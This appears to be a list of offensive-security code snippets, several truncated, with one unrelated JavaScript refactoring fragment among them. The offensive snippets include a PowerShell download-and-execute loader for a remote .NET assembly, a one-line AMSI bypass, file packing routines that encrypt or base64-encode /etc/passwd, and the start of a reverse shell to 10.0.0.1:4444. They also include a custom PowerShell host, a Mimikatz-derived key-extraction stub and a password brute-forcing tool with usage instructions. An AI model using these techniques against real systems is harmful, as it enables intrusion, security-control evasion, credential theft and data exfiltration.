```powershell
$url = "http://server/dotnetexecutable"
$data = (New-Object System.Net.WebClient).DownloadData($url);
$assem = [System.Reflection.Assembly]::Load($data);
$main = $assem.EntryPoint
$main.Invoke(0, @(,[string[]]@("args0")));
```
```powershell
[Runtime.InteropServices.Marshal]::Copy([Int32[]]@(0), 0,(([Ref].Assembly.GetTypes()|?{$_.Name -like "*iUtils"}).GetFields('NonPublic,Static')|?{$_.Name -match "Context"}).GetValue($null), 1)
```
```javascript
const { refactor } = require('shift-refactor');
const { commonMethods } = require('refactor-plugin-common');
const Shift = require('shift-ast');
const fs = require('fs');
const src = `
var a = "aap";
function foo() {
function bar() {
```
```powershell
powershell "$sql='SELECT @@VERSION';$c=(New-Object -TypeName System.Data.SqlClient.SqlConnection('server=SERVER;Database=DATABASE;Integrated Security=True;'));$c.open();$q=(New-Object System.Data.SqlClient.SqlCommand($sql,$c));$r=$q.ExecuteReader();$oo=@();while ($r.Read()){$o=(New-Object PSObject);for ($i=0;$i -lt $r.FieldCount;$i++){$n=$r.GetName($i);if($n -eq ''){$n='column_'+$i};$o|Add-Member -type NoteProperty -Name $n -Value $r[$i];}$oo+=$o};$oo|FT -Wrap"
```
```powershell
$filepath = "/etc/passwd"
$fs = New-Object IO.FileStream($filepath, [System.IO.FileMode]::Open);
$ms = New-Object System.IO.MemoryStream;
$aes = [System.Security.Cryptography.Aes]::Create();
$aes.keysize = 128;
Write-Host "Key: " (($aes.Key |% ToString X2) -join '');
Write-Host "IV: " (($aes.IV |% ToString X2) -join '');
Write-Host "Mode: " $aes.mode
$cs = New-Object System.Security.Cryptography.CryptoStream($ms, $aes.CreateEncryptor(), [System.Security.Cryptography.CryptoStreamMode]::Write);
$fs.CopyTo($cs);
```
```powershell
$filepath = "/etc/passwd"
$fs = New-Object IO.FileStream($filepath, [System.IO.FileMode]::Open)
$ms = New-Object System.IO.MemoryStream;
$gzs = New-Object System.IO.Compression.GzipStream($ms, [System.IO.Compression.CompressionMode]::Compress);
$fs.CopyTo($gzs);
$fs.Close();
$gzs.Close();
$ms.Close();
[System.Convert]::ToBase64String($ms.ToArray());
```
```python
import codecs
import base64
data = '''$lhost="10.0.0.1";
$lport=4444;
$MAXCMDLENGTH=65535;
$client = New-Object System.Net.Sockets.TCPClient($lhost, $lport);
$stream = $client.GetStream();
```
```csharp
// c:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe pshost.cs /r:c:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
using System;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using PowerShell = System.Management.Automation.PowerShell;
internal class InfantAnnihilator
{
    private static void Main(string[] args)
    {
```
```python
# Referenced sources:
# - Mimikatz
# - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wcce/5cf2e6b9-3195-4f85-bc18-05b50e6d4e11
# - https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/ns-wincrypt-publickeystruc
from io import BytesIO
import struct
import math
import codecs
from Crypto.PublicKey import RSA
```
```java
/*
- Get the .jar files from the server (check .jnlp file).
- Extract those .jar files (unzip).
- Place Brutus.java in the same directory.
- Compile using the JDK: "c:\Program Files\Java\jdk-16\bin\javac.exe" -target 1.7 -source 1.7 Brutus.java
- Notice the target & source. Otherwise CORBA can't be found.
- Run: java Brutus <accountname> <ascii password file> <target>
- Example: java Brutus beheerder passwords.txt xelion.local
*/
```